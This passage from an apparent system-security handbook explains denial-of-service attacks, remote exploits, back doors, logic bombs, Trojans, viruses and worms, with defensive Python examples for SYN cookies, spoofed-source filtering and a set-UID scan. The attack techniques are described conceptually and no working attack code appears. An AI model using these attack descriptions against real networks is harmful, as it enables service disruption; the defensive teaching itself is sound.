One of the simplest denial of service attacks is a process attack. In a process attack, one user makes a computer unusable for others who happen to be using the computer at the same time. Another common process-based denial of service occurs when a user spawns many processes that consume large amounts of CPU or disk bandwidth. Yet another is when a user's programs use up all of the system's memory (physical and virtual). Such programs are sometimes called bacteria or rabbits, in tribute to their rapid spawning. These attacks are generally of concern only with shared computers: the fact that a user incapacitates his or her own workstation is of no interest if nobody else is using the machine. For suggestions on recovering from a process-based attack, see PUIS, Chapter 24. The best way to deal with overload problems is to educate your users about how to share the system fairly. If CPU-intensive jobs are common and you have a network of similar machines, you may wish to investigate a distributed task scheduling system. Quotas and limits, if supported by the operating system, can also be helpful.

Disk Attacks

Another way of overwhelming a system is to fill a disk partition. If one user fills up the disk, other users won't be able to create files or do other useful work. Sometimes disks fill up suddenly when an application program or a user erroneously creates too many files (or a few files that are too large). Other times, disks fill up because many users are slowly increasing their disk usage.
Most operating systems provide commands to help the administrator examine disk space usage by device and user and make decisions about which files to delete to recover space. An effective way to protect your system from disk attacks is to use your operating system's disk quota feature (usually available on POSIX-based systems). With disk quotas, each user can be limited in their disk use. Disk quotas typically need to be specified for each disk partition or filesystem that users can access; don't forget about the partitions that store e-mail boxes or that provide temporary file space to processes.

You can also help protect your system from disk attacks and accidents by dividing your hard disk into several smaller partitions. Place different users' home directories on different partitions. If one user fills up one partition, users on other partitions won't be affected. Drawbacks of this approach include needing to move directories to different partitions if they require more space, and an inability to hard-link files between some user directories on systems that support hard links. If you run network services that have the potential to allow outsiders to use up significant disk space (e.g., incoming mail or an anonymous FTP site that allows uploads), consider isolating them on separate partitions to protect your other partitions from overflows. Temporarily losing the ability to receive mail or files is an annoyance, but losing access to the entire server is much more frustrating. Some filesystems, particularly those used on Unix systems, automatically reserve a portion of the disk that can only be used by superuser processes. This feature can help protect the system when the disk is full by allowing the superuser to log in and administer the system.
On filesystems that don't provide this feature, you can simulate it by creating a large dummy file on the disk that you can later delete if you need to recover space in an emergency.

Network Denial of Service Attacks

Networks are also vulnerable to denial of service attacks. In attacks of this kind, someone prevents legitimate users from using the network. Network denials of service come in several flavors.

Service Overloading

Service overloading occurs when floods of network requests are made to a server daemon on a single computer. These requests can be initiated in a number of ways, both accidental and intentional. Service overloading can cause the system to be so busy servicing network interrupt requests that it can't perform any other tasks in a timely fashion. Many requests will be thrown away because there is no room to queue them. Invariably, the legitimate requests will be resent, further adding to your computer's load. If a service that causes a daemon to start a new process is under attack, your system may spawn so many new processes that it has no process table entries remaining to perform useful work. Similarly, the attack may cause the service to consume too much memory, CPU, or disk space.

The overload caused by the attack may be the ultimate goal of the attacker. Alternatively, the attack may be planned to mask an attack somewhere else. For example, a machine that records audit records may be attacked to prevent a login or logout from being logged in a timely manner. The overloading attack may be staged merely to distract attention or clog communications lines while something else, such as a car bombing, is taking place. You can use a network monitor to reveal the type, and sometimes the origin, of overload attacks. If you have a list of machines and their hardware addresses (i.e., Ethernet board-level addresses, not IP addresses), this may help you track the source of the problem if it is local to your network.
Isolating your local subnet or network while finding the problem may also help. If you have logging on your firewall or router, you can quickly determine whether the attack is coming from outside your network or from inside; you cannot depend on the source IP address in the packet being correct. Although you cannot prevent overload attacks, there are many measures that you can take to limit their damage or make your system more robust against them.

Prepare for the attack
Install monitoring, logging, and other analysis systems, so that if an attack takes place, you will be able to rapidly diagnose the type of attack and, hopefully, the source. Have (protected) spare taps on your subnet so you can quickly hook up and monitor network traffic. Have printed lists of machine hardware and IP addresses available so you can determine the source of the overload by observing packet flow.

Partition your network into multiple subnets
This way, if one subnet gets flooded as part of an attack or accident, not all of your machines are disabled.

Provide for multiple Internet connections to your organization
These connections may include some that are not advertised but are kept in reserve.

Use "throttle" controls in your applications
Some applications have a "throttle" built in. If too many requests are received in too short a time, they will start rejecting requests and log a message that the service is failing. This is done under the assumption that some bug has been triggered to cause all the traffic. This has the side effect of disabling your service as surely as if all the requests were accepted for processing. However, it may prevent the server itself from failing, and it results in an audit record showing when the problem occurred.
Make sure the limits specified in your configuration file are reasonable
For example, if you are running the Apache web server, a sudden increase in the number of requests to your server can cause a large number of http processes to be fork()'ed off. The total number of simultaneous connections is controlled by the parameter MaxClients in the Apache configuration file httpd.conf. Many Apache distributions have MaxClients set at the value of 200, meaning that a maximum of 200 separate http processes might exist. If each httpd process has a memory footprint of 8 megabytes, that could conceivably take 1.6 gigabytes of swap space. On the other hand, if each http process is taking 20 megabytes, then you would need 40 gigabytes of swap space, probably more than your system has.

Message Flooding

Message flooding occurs when a user slows down the processing of a system on the network, to prevent the system from processing its normal workload, by "flooding" the machine with network messages addressed to it. These may be requests for file service or login, or they may be simple echo-back requests. Whatever the form, the flood of messages overwhelms the target so that it spends most of its resources responding to the messages. In extreme cases, this flood may cause the machine to crash with errors or lack of memory to buffer the incoming packets. This attack denies access to a network server. A server that is being flooded may not be able to respond to network requests in a timely manner. An attacker can take advantage of this behavior by writing a program that answers network requests in the server's place. For example, an attacker could flood an NIS server and then issue his own replies for NIS requests, specifically, requests for passwords. A similar type of attack is a broadcast storm. By careful crafting of network messages, you can create a special message that instructs every computer receiving the message to reply or retransmit it.
The result is that the network becomes saturated and unusable. Prior to the late 1990s, broadcast storms almost always resulted from failing hardware or from software that was under development, buggy, or improperly installed. However, it is possible to craft an intentional broadcast storm, and the so-called smurf and fraggle attacks were examples of such storms. Broadcasting incorrectly formatted messages can also bring a network of machines to a grinding halt. If each machine is configured to log the reception of bad messages to disk or console, storms can generate so many messages that the clients can do nothing but process the errors and log them to disk or console.

Once again, preparing ahead with a monitor and breaking your network into subnets will help you prevent and deal with this kind of problem, although such planning will not eliminate the problem completely. In addition, some packet-filtering firewalls (external or host-based) can perform connection-rate throttling to reduce the impact of these kinds of attacks. The Linux 2.4 kernel's netfilter component is particularly notable in this regard. It is important that all routers and firewalls be correctly configured to prevent forwarding of broadcast packets other than from authorized hosts. Check your vendor documentation for information on how to do this. CERT/CC advisory CA-1998-01, available from their WWW site, provides details on how to configure many common systems to stop such forwarding. Most attack software that initiates denial-of-service attacks uses randomly generated source addresses to decrease the likelihood that the packets will be intercepted. As a result, egress filters on border routers will frequently stop computers within your network from participating in distributed denial of service attacks, and if they are still involved, it will make it much easier to trace them, because the attack packets will have proper return addresses.
Clogging (SYN Flood Attacks)

The implementation of the TCP/IP protocols on some operating systems allows them to be abused in various ways. One way to deny service is to use up the limit of partially open connections. TCP opens a connection with a multi-way handshake that also sets the connection's parameters. If an attacker sends multiple requests to initiate a connection ("SYN" packets) but then fails to follow through with the subsequent parts of the handshake, the recipient will be left with multiple half-open connections that occupy limited resources. Usually, these connection requests have forged source addresses that specify nonexistent or unreachable hosts that cannot be contacted. Thus, there is also no way to trace the connections back. They remain until they time out (or until they are reset by the intruder). Such attacks are often called SYN flood attacks or, more simply, clogging.

There are many solutions to the problem of SYN floods. Some operating systems will automatically detect when they are being subjected to a SYN flood attack and will lower the timeout for SYN packets. Alternatively, if the table of half-open connections is filled, the operating system can choose to randomly drop one of the entries from the table. As the table usually only fills up when the system is under attack, the odds are overwhelming that one of the attacker's SYN packets will be dropped. Finally, the server can use SYN cookies. When SYN cookies are in use, the SYN+ACK that is sent from the TCP server to the TCP client contains enough information for the server to reconstruct its half of the TCP connection, allowing the server to flush the original SYN from its tables. When the ACK is received from the client, the server reconstructs the original SYN, the TCP three-way handshake is completed, and the connection starts up. This effectively makes TCP setup a stateless process.
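The SYN cookie mechanism just described, as an added example that is not the handbook's code and is a simplified form of the scheme on Bernstein's page cited below: the server encodes a time slot, an MSS index and a keyed hash of the connection's addresses and ports into its initial sequence number, stores nothing, and recovers everything from the client's ACK. The addresses, ports and secret are constructed.

```python
"""SYN cookies (added example, not the handbook's code; a simplified version
of the scheme on Bernstein's page cited in the text). The server puts all the
state it needs into its initial sequence number, keeps no half-open entry,
and reconstructs the connection from the client's ACK. Addresses, ports and
the secret below are constructed."""
import hashlib
import hmac

# 32-bit cookie layout: bits 31..27 time counter t (64-second slots, mod 32),
# bits 26..24 index into MSS_TABLE, bits 23..0 keyed hash of the 4-tuple and t.
MSS_TABLE = (536, 1300, 1440, 1460)   # the MSS values a 3-bit field can encode
MAX_AGE_SLOTS = 2                     # ACKs older than this are refused
SECRET = b"constructed-demo-secret"   # a real kernel uses a random, rotating secret


def _slot(now: int) -> int:
    """Coarse clock: 64-second slots, wrapped to 5 bits."""
    return (now // 64) & 0x1F


def _hash24(saddr: str, sport: int, daddr: str, dport: int, t: int) -> int:
    msg = f"{saddr}|{sport}|{daddr}|{dport}|{t}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_syn_cookie(saddr, sport, daddr, dport, mss, now) -> int:
    """Server's ISN for the SYN+ACK. Nothing is stored for this SYN, so a flood
    of SYNs from unreachable sources costs only the hash computations."""
    t = _slot(now)
    idx = max((i for i, v in enumerate(MSS_TABLE) if v <= mss), default=0)
    return (t << 27) | (idx << 24) | _hash24(saddr, sport, daddr, dport, t)


def check_syn_cookie(ack_number, saddr, sport, daddr, dport, now):
    """On the client's ACK: recover t from the cookie, recompute the hash, and
    return the MSS to use, or None if the ACK is stale, forged or belongs to
    another connection. The 24-bit hash cannot be produced without the secret,
    so a forged source address that never sees the SYN+ACK cannot complete."""
    cookie = (ack_number - 1) & 0xFFFFFFFF   # the ACK acknowledges ISN + 1
    t = cookie >> 27
    if (_slot(now) - t) & 0x1F > MAX_AGE_SLOTS:
        return None
    if _hash24(saddr, sport, daddr, dport, t) != (cookie & 0xFFFFFF):
        return None
    return MSS_TABLE[(cookie >> 24) & 0x7]


def flood_then_connect(n_forged: int, now: int = 1_000_000):
    """Simulate n_forged SYNs from unreachable sources followed by one real
    client. Every SYN gets a cookie, the half-open table stays empty, and the
    real client's handshake still completes. Returns (table size, client MSS)."""
    server = ("198.51.100.10", 80)
    half_open_table = []                           # never grows with cookies
    for i in range(n_forged):
        make_syn_cookie(f"192.0.2.{i % 254 + 1}", 1024 + i, *server, 1460, now)
    client = ("203.0.113.5", 40000)
    isn = make_syn_cookie(*client, *server, 1460, now)
    mss = check_syn_cookie((isn + 1) & 0xFFFFFFFF, *client, *server, now + 30)
    return len(half_open_table), mss


if __name__ == "__main__":
    print(flood_then_connect(1000))   # (0, 1460): no state held, client connected
```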
SYN cookies were invented by Daniel Bernstein and are described in detail at http://cr.yp.to/syncookies.html. A SYN cookies implementation is included with BSD and Linux systems (but must be specifically enabled on Linux systems). Some operating systems allow you to change the queuing behavior for half-open connections. You can increase the size of the queue and decrease the time before a half-open connection times out. Again, this is nonstandard in form, and some vendor versions require manipulation of kernel variables with a symbolic debugger. Check with your vendor for specifics.

Malformed traffic attacks

In the past, bugs in low-level network drivers have caused many systems to fail when presented with a single malformed packet or HTTP query. For example, the infamous "Ping of Death" caused both Windows and Unix systems to crash when they received an ICMP packet that was longer than a specific threshold value. Many networked devices, including printer servers, home firewalls, and even routers, have crashed when they were probed for IIS or Apache vulnerabilities. In general, the only way to protect against malformed traffic is to use a proxy firewall and to be sure that your systems are properly updated.

Distributed denials of service

The most pernicious network attacks are distributed denial of service (DDoS) attacks. In a DDoS attack, the attacker overloads network services or floods the network with messages, but does so from a large number of different attack hosts distributed around the Internet. Because the attack packets do not come from a single system, it is difficult to block them with a packet filtering firewall without cutting your hosts off from the whole of the Internet. DDoS attacks are usually coordinated through slave processes (zombies or Trojans) installed on compromised hosts that allow the attacker to remotely direct the hosts to attack a target.
A key to preventing DDoS attacks (and potential liability) is keeping your systems protected from compromise so that they cannot be used as zombies in further attacks. At the network level, implementing ingress and egress filtering to prevent packets with bogus source addresses from leaving the local network can prevent local machines from participating in DDoS attacks. This strategy is discussed in RFC 2827. However, DDoS attacks do not require the use of special software. One form of DDoS attack involves simply sending ICMP echo ("ping") messages with forged source addresses to many computers around the Internet. The ICMP echo replies are returned to the victim computer. Another version simply initiates a number of TCP connection attempts from nonexistent IP addresses. The target machine consumes resources initiating and verifying the connection attempts, and this can paralyze a machine if enough requests come in. Sometimes a DDoS attack can be defeated in progress by changing the IP address and hostname of the machine being attacked. If the attack software is using a hardcoded victim address or hostname, changing these can protect the victim host, and packets directed at the old address can be filtered at the external router or by the organization's ISP. For example, the Blaster worm in August 2003 was designed to initiate a DDoS attack against a hardcoded address for the Microsoft Windows Update service. Microsoft responded by ensuring that Windows Update would use a different IP address. One of the best known DDoS attacks took place in February 2000 and targeted web servers at high-profile companies like Amazon and Yahoo.
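The ingress and egress filtering of RFC 2827 mentioned above, and the border-router egress filtering recommended at the end of the broadcast storm discussion, as one added example that is not the handbook's code: a border filter that refuses outbound packets whose source address is not the site's own and inbound packets that claim a site address. The site prefixes and packets are constructed; the filter goes slightly beyond the text by also dropping inbound sources from private and other unroutable ranges.

```python
"""RFC 2827 source-address filtering at a border router (added example, not
the handbook's code). Outbound packets must carry a source address from the
site's own prefixes; inbound packets must not. Prefixes and packets are
constructed for illustration."""
import ipaddress
from typing import Dict, Iterable, List, NamedTuple, Tuple


class Packet(NamedTuple):
    direction: str   # "out": leaving the site; "in": arriving from the Internet
    src: str
    dst: str


# Address space that should never appear as a source on the public side:
# RFC 1918 and link-local IPv4, loopback, unspecified, multicast, IPv6 ULA.
_BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8")]


class BorderFilter:
    def __init__(self, site_prefixes: Iterable[str]) -> None:
        self._site = [ipaddress.ip_network(p) for p in site_prefixes]

    @staticmethod
    def _in_any(addr: str, nets) -> bool:
        ip = ipaddress.ip_address(addr)
        return any(ip in n for n in nets)   # an IPv4/IPv6 mismatch is simply False

    def verdict(self, pkt: Packet) -> str:
        """'forward' or 'drop:<reason>'."""
        if pkt.direction == "out":
            # Egress rule: a host inside may only speak with an inside address.
            # Forged-source DDoS traffic from a compromised host stops here, and
            # anything that does leave carries a traceable return address.
            if self._in_any(pkt.src, self._site):
                return "forward"
            return "drop:spoofed-egress"
        if pkt.direction == "in":
            # Ingress rule: the outside world cannot legitimately claim to be us.
            if self._in_any(pkt.src, self._site):
                return "drop:spoofed-ingress"
            if self._in_any(pkt.src, _BOGONS):
                return "drop:bogon-ingress"
            return "forward"
        return "drop:bad-direction"


def run_filter(flt: BorderFilter,
               packets: Iterable[Packet]) -> Tuple[int, Dict[str, List[Packet]]]:
    """Forwarded count plus dropped packets grouped by reason; the egress drops
    name the internal hosts that need to be found and cleaned up."""
    forwarded = 0
    dropped: Dict[str, List[Packet]] = {}
    for pkt in packets:
        v = flt.verdict(pkt)
        if v == "forward":
            forwarded += 1
        else:
            dropped.setdefault(v, []).append(pkt)
    return forwarded, dropped


# Constructed site prefixes (documentation ranges) and a mixed packet sample.
SITE_PREFIXES = ("203.0.113.0/24", "2001:db8:1::/48")
SAMPLE_PACKETS = [
    Packet("out", "203.0.113.7", "198.51.100.9"),     # normal outbound traffic
    Packet("out", "198.51.100.9", "203.0.113.7"),     # inside host forging a source
    Packet("out", "2001:db8:1::10", "2001:db8:2::1"),
    Packet("in", "192.0.2.1", "203.0.113.9"),         # normal inbound traffic
    Packet("in", "203.0.113.7", "203.0.113.9"),       # outsider claiming our address
    Packet("in", "10.0.0.1", "203.0.113.9"),          # private source from the Internet
]

if __name__ == "__main__":
    fwd, drops = run_filter(BorderFilter(SITE_PREFIXES), SAMPLE_PACKETS)
    print("forwarded:", fwd)
    for reason, pkts in drops.items():
        print(reason, [p.src for p in pkts])
```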
An analysis of trinoo, the Trojan that was used to compromise and control the zombies that participated in the attack, can be found at http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm

Remote exploits

Because network server applications are designed to communicate with untrusted outsiders, and because many run with special privileges, bugs in network server applications can often lead to remote exploits. Many remote exploits are based on the buffer overflow technique. This technique relies on the way that the C programming language lays out information inside the computer's memory. The remote system might try to store 100 bytes into a buffer that is only set up to hold 30 or 40 bytes. The resulting information overwrites the C program's stack frame and causes machine code specified by the attacker to be executed with the process's privileges.[242] The most important defense against remote exploits is care in choosing and configuring networking software. Some application programs have repeatedly proven vulnerable, while others have been designed from the outset with security in mind and have a much lower rate of compromise. This defense is covered in greater depth in the chapter on Server Security.

Programmed Threats

Computers are designed to execute instructions one after another. These instructions usually do something useful: calculate values, maintain databases, and communicate with users and with other systems. Sometimes, however, the instructions executed can be damaging or malicious in nature. When the damage happens by accident, we call the code involved a software bug. Bugs are perhaps the most common cause of unexpected program behavior. But if the source of the damaging instructions is an individual who intended that the abnormal behavior occur, the instructions are malicious code, or a programmed threat. Some people use the term malware to describe malicious software.
These days, most programmed threats arrive via the Internet, in the form of either an e-mail message or a direct attack on a network-based server. A received e-mail message or direct attack may be the result of a random event (your organization's web server might be randomly chosen), or it may be deliberate: you may have been specifically targeted by an adversary. It is easy to mistake a directed attack for a random one, and vice versa. A directed attack is much more worrisome than a random one, as a motivated attacker may continue to assault your organization until the attacker is successful or is stopped.

Users may also be unwitting agents of transmission for viruses, worms, and other such threats. They may install new software from outside, and install embedded malicious code at the same time. They may run a "screen saver" or download a pornographic "viewer" from the Internet that contains a Trojan horse. Of course, most programs that are downloaded from the Internet do not contain any hostile code at all. However, the widespread practice of downloading and running code from untrusted sources makes it all the easier for hostile programs to be successful. You must therefore be extremely cautious about importing source code and command files from outside sources. High-security sites should avoid software that is not cryptographically signed by a trusted author. This won't necessarily protect you, but it will give you somebody to sue if things go wrong. If possible, never download binary files. Instead, read through and understand the source code of all software (if available) before installing a new package on your system. If you are suspicious of the software, don't use it, especially if it requires special privileges. Accept software only from trusted sources. Note that you should not automatically trust software from a commercial firm or group.
Sometimes commercial firms insert back doors into their code to allow for maintenance, or recovering lost passwords; others have been known to distribute privacy-invading "spyware" with their software. As long as customers are willing to purchase software that comes with broad disclaimers of warranty and liability, there will be little incentive for vendors to be accountable for the code they sell. Thus, you might want to seek other, written assurances about any third-party code you buy and install on your computers.

Free software is no safer, although it has the advantage of providing source code that you can read for yourself. Most freeware (and open source) project software is written and maintained by multiple programmers. Contributions are often accepted without careful screening by other members of the group. Thus, a small addition can be made without being observed by others. Furthermore, even if the code is scanned, subtle dependencies and back doors may not be recognized -- few people know how to carefully review software, and if they are not particularly interested in understanding every nuance, they may easily miss something nasty. Even an "independent" review may not be sufficient: besides lack of training, people can make mistakes, and sometimes there will even be collusion between the reviewer and the coder!

Unfortunately, many programs that are downloaded and run are simply too big to read through on a routine basis. What's more, even though many programs are available for download in source code form, many people download pre-compiled binaries. There is no way to assure that the binaries being downloaded actually match the source code from which they were reportedly produced, short of compiling the inspected source yourself.

242 This form of attack is at least 35 years old and well known. It is astonishing that vendors are still building software that can be exploited this way.
As an alternative to inspection, only run programs that other people have tested before you. This method isn't fail-safe, because it's possible that the program has an attack that won't trigger for other people but will trigger for you. Or it's possible that the program triggers for many people, but nobody else notices the attack.

As a matter of good policy, new software should first be installed on some noncritical systems for testing and familiarization. This practice gives you an opportunity to isolate problems, identify incompatibilities, and note quirks. Don't install new software first on a "live" production system! And never, ever run anything as the superuser or administrator unless you absolutely must.

If you are targeted by a knowledgeable insider, that insider may write back doors, logic bombs, Trojan horses, and bacteria directly on the target system using readily available tools. Your users and especially your staff pose a significant threat to your system's overall security: these people understand the system, know its weaknesses, and know the auditing and control systems that are in place. Legitimate users often have access with sufficient privilege to write and introduce malicious code into the system. Especially ironic, perhaps, is the idea that at many companies the person responsible for security and control is also the person who could cause the most damage if he wished to issue the appropriate commands. Frequently, there is no technical auditing or other checks and balances for senior system management.

Security tools and toolkits

Many programs have been written that can automatically scan for computer security weaknesses. Some of these programs quickly probe the computer on which they are running for system vulnerabilities, while others scan over a network for vulnerabilities that can be exploited remotely. These programs are sometimes called security scanners or, more generally, security tools.
Scanners and other tools are double-edged programs. On the one hand, they can be used by professionals for the purpose of securing computer systems: if you can rapidly scan a system for known vulnerabilities, you can use that list of vulnerabilities as a checklist that tells you what to fix. On the other hand, these tools can also be used by perpetrators intent on penetrating computer systems: security scanners give these individuals and organizations a roadmap of how to break into systems.

Some security tools are written for professional use, although they can obviously be used by attackers as well. Still more tools are distributed over the Internet exclusively for malicious use. Ironically, the code quality of some malicious tools is very high -- so high that these tools have been taken up by security professionals. The nmap network mapping tool is an example of a tool that was developed by the computer underground and is now widely used by professionals. Rootkits are a special case: these are prepackaged attack toolkits which, once the attacker has obtained superuser access, install back doors and replace system programs (or kernel components) so that the intrusion is hidden from the administrator's usual tools.

Because of the availability of security tools and high-quality attackware, you must be aware of potential vulnerabilities in your systems, and keep them protected and monitored. Obtaining the tools and running them yourself has some merit, but there are also dangers. Some of the tools are not written with safety or portability in mind, and may damage your systems. Other tools may be booby-trapped to compromise your system clandestinely, when you think you are simply scanning for problems. Don't rush to use security scanners yourself unless you are very certain that you understand what they do and how they might help you secure your own system.
Back Doors and Trap Doors

Back doors, also called trap doors, are pieces of code written into applications or operating systems to grant programmers access to programs without requiring them to go through the normal methods of access authentication. Back doors and trap doors have been around for many years. They're typically written by application programmers who need a means of debugging or monitoring code that they are developing. Most back doors are inserted into applications that require lengthy authentication procedures, or long setups requiring a user to enter many different values to run the application. When debugging the program, the developer may wish to gain special privileges, or to avoid all the necessary setup and authentication steps. The programmer also may want to ensure that there is a method of activating the program should something be wrong with the authentication procedure that is being built into the application. The back door is code that either recognizes some special sequence of input, or is triggered by being run from a certain user ID. It then grants special access.

Back doors become threats when they're used by unscrupulous programmers to gain unauthorized access. They are also a problem when the initial application developer forgets to remove a back door after the system has been debugged and some other individual discovers the door's existence. Sometimes, an attacker inserts a back door in a system after he successfully penetrates that system. The back door gives the cracker a way to get back into the system or to gain administrative privileges at a later time.

Protecting against back doors is complicated. The foremost defense is to routinely check the integrity of important files (see chapter 5-3). In addition to checking your files, you should routinely scan the system for privileged (set-UID and set-GID) files, scan your system for listening TCP/IP ports, and periodically check permissions and ownership of important files and directories. Compare each scan against the previous one: a new privileged program, a new listening port, or a directory that has become world-writable is exactly the kind of change that deserves an explanation.
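The following script is an added example of the permission scan just described; it is not code from the Handbook or from any integrity-checking product. It walks a directory tree and reports set-UID and set-GID executables and world-writable files or directories (a sticky-bit directory such as /tmp is the accepted exception). The demo tree it builds is constructed sample data, and the report format is the example's own. Because it relies on the interpreter's own stat() calls, run it from a known-good toolset (a clean boot or a second machine) rather than on the suspect system's own binaries.

```python
"""Scan for files that commonly mark a back door: set-UID/set-GID executables and
world-writable files or directories. Added example; not Handbook code."""
import os
import stat
import tempfile


def classify(path, st):
    """Return findings for one entry given its stat result; pure, so easy to test."""
    findings = []
    mode = st.st_mode
    if stat.S_ISREG(mode):
        if mode & stat.S_ISUID:
            findings.append(("setuid", path, st.st_uid))
        if mode & stat.S_ISGID:
            findings.append(("setgid", path, st.st_gid))
    # A world-writable file or directory lets any local user plant or alter code.
    # The sticky-bit directory (mode 1777, like /tmp) is the accepted exception.
    if mode & stat.S_IWOTH and not (stat.S_ISDIR(mode) and mode & stat.S_ISVTX):
        findings.append(("world-writable", path, st.st_uid))
    return findings


def scan_tree(root):
    """Walk root and return sorted (kind, absolute path, owner id) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # vanished or unreadable: skip it, do not abort the audit
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode is meaningless; its target is checked in place
            findings.extend(classify(full, st))
    return sorted(findings)


def relative_findings(root):
    """Same as scan_tree, with paths relative to root (handy for reports and tests)."""
    return sorted((kind, os.path.relpath(path, root)) for kind, path, _ in scan_tree(root))


def synthetic_stat(mode, uid=0, gid=0):
    """Build a stat result without touching the disk (used to exercise classify)."""
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))


def build_demo_tree():
    """Constructed sample tree (not a real system): one set-UID program, one
    world-writable directory without the sticky bit, and one properly protected file."""
    root = tempfile.mkdtemp(prefix="backdoor-scan-")
    os.mkdir(os.path.join(root, "bin"))
    helper = os.path.join(root, "bin", "helper")
    with open(helper, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(helper, 0o4755)                        # rwsr-xr-x
    os.mkdir(os.path.join(root, "dropbox"))
    os.chmod(os.path.join(root, "dropbox"), 0o777)  # rwxrwxrwx, no sticky bit
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as f:
        f.write("baseline\n")
    os.chmod(secret, 0o600)
    return root


if __name__ == "__main__":
    for kind, path, owner in scan_tree(build_demo_tree()):
        print(f"{kind:15} uid={owner:<6} {path}")
```

Save the output of each run and diff it against the previous one; a privileged program that was not there last week is the finding, not the long-standing list of set-UID programs that every Unix system ships with.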
Unfortunately, it is now possible to hide the existence, the function, and the triggers of hostile software with great subtlety. As a result, if you allow your system to become compromised, you may not be able to detect that changes have taken place.

Logic Bombs

Logic bombs are programmed threats that lie dormant in commonly used software for an extended period of time until they are triggered; at this point, they perform a function that is not the intended function of the program in which they are contained. Logic bombs usually are embedded in programs by software developers who have legitimate access to the system.

Conditions that might trigger a logic bomb include the presence or absence of certain files, a particular day of the week, or a particular user running the application. The logic bomb might check first to see which users are logged in, or which programs are currently in use on the system. Once triggered, a logic bomb can destroy or alter data, cause machine halts, or otherwise damage the system. In one classic example, a logic bomb checked for a certain employee ID number and then was triggered if the ID failed to appear in two consecutive payroll calculations (i.e., the employee had left the company).

Time-outs are a special kind of logic bomb that are occasionally used to enforce payment or other contract provisions. Time-outs make a program stop running after a certain amount of time unless some special action is taken, such as paying a license fee. Time-outs are regularly included in beta test software so that users upgrade to newer builds or to the formal release.

Protect against malicious logic bombs in the same way that you protect against back doors: don't install software without thoroughly testing it and reading it. Keep regular backups so that if something happens, you can restore your data.
Trojan Horses

Analogous to their namesake, modern-day Trojan horses resemble a program that the user wishes to run--a login process, a game, a spreadsheet, or an editor. While the program appears to be doing what the user wants, it actually is doing something else unrelated to its advertised purpose, and without the user's knowledge. For example, the user may think that the program is a game. While it is printing messages about initializing databases and asking questions like "What do you want to name your player?" and "What level of difficulty do you want to play?" the program may actually be deleting files, reformatting a disk, or posting confidential documents to a web site across the globe.

Trojan horses are, unfortunately, as common as jokes within some environments. They are often planted as cruel tricks on hacker web sites and circulated among individuals as shared software. Trojan horses have been found in installation programs and scripts. Shell files (especially shar files), VBS, awk, Perl, and sed scripts, TeX files, PostScript files, MIME-encoded mail, and web pages can all contain commands that can cause you unexpected problems. Even text files can be dangerous. Some editors allow commands to be embedded in the first few lines or the last few lines of files to let the editor automatically initialize itself and execute commands (see the documentation for your own editor to see how to disable this feature).

If you are unpacking files or executing scripts for the first time, you might wish to do so on a secondary machine or use a restricted environment to prevent the package from accessing files or directories outside its work area. Unix provides a limited form of this via the chroot() system call; note, however, that a process running as root inside a chroot can usually break out of it, so run the confined process as an unprivileged user and do not treat chroot as a substitute for a separate machine.

Another form of a Trojan horse makes use of block-send commands or answerback modes in some serial terminals that were developed in the 1970s and 1980s (and that are emulated by many terminal emulation programs written since, including Microsoft's HyperTerminal).
Many brands of terminals have modes where certain sequences of control characters will cause the current line or status line to be answered back to the system as if it had been typed on the keyboard. Thus, a command embedded in mail may direct the terminal to send a "delete all files and log out" command to the operating system, followed by a "clear screen" sequence to the terminal. Avoid or disable this feature on your terminal or emulator.

Viruses

A true virus is a sequence of code that is inserted into other executable code, so that when the regular program is run, the viral code is also executed. The viral code causes a copy of itself to be inserted in one or more other programs. Viruses are not distinct programs--they cannot run on their own, and they need to have some host program, of which they are a part, executed to activate them.

Nearly all viruses target personal computers running popular operating systems, such as Microsoft DOS, Microsoft Windows, and Apple MacOS. Viruses can propagate on operating systems that offer relatively little protection, such as DOS and MacOS versions prior to 10, and on those that offer high degrees of protection, such as Microsoft Windows NT and XP. Viruses have also been written for Unix systems; virus authors have even created cross-platform viruses that can infect both Windows and Unix-based systems. Viruses that target PC boot sectors can infect systems running BSD or Linux as easily as Windows if an infected floppy disk is booted (although they often cannot spread further).

Viruses are a powerful tool for attackers. While any task that can be accomplished by a virus can be accomplished through other means, viruses are able to spread without the involvement or direction of the attacker. They can also spread to areas that the attacker cannot personally reach.
You can protect yourself against viruses using the same techniques you use to protect your system against back doors and crackers. On Intel-based PCs, it's also important not to boot from untrusted disks. Anti-virus software is now considered a basic requirement for corporate and home PCs. Despite this, more machines lack anti-virus software than have it. Almost as unfortunate is the fact that many people who have purchased anti-virus software have failed to update the virus signatures recently, thus rendering the software largely useless against current threats.

Worms

Worms are programs that can run independently and travel from machine to machine across network connections; worms may have portions of themselves running on many different machines. Worms do not change other programs, although they may carry other code that does (for example, a true virus). There have been dozens of network worms that have targeted many different operating systems. Perhaps the most common propagate by e-mail, often extracting e-mail addresses from the infected system's e-mail application's address book and sending themselves to those users, claiming to be an important message from the infected system's owner (or from other users whose addresses are in the owner's address book).

Protecting against worm programs requires the same techniques as protecting against break-ins. If an intruder can enter your machine, so can a worm. If your machine is secure from unauthorized access, it should be secure from the worm as well. All of our advice about protecting against unauthorized access applies here.

If you suspect that your machine is under attack by a worm program across the network, call one of the computer-incident response centers to see if other sites have made similar reports. You may be able to get useful information about how to protect or recover your system in such a case. Consider severing your network connections immediately to isolate your local network.
If there is already a worm program loose in your system, you may help prevent it from spreading, and you may also prevent important data from being sent outside of your local area network. If you've done a good job with your backups and other security, little should be damaged.

Blended Threats

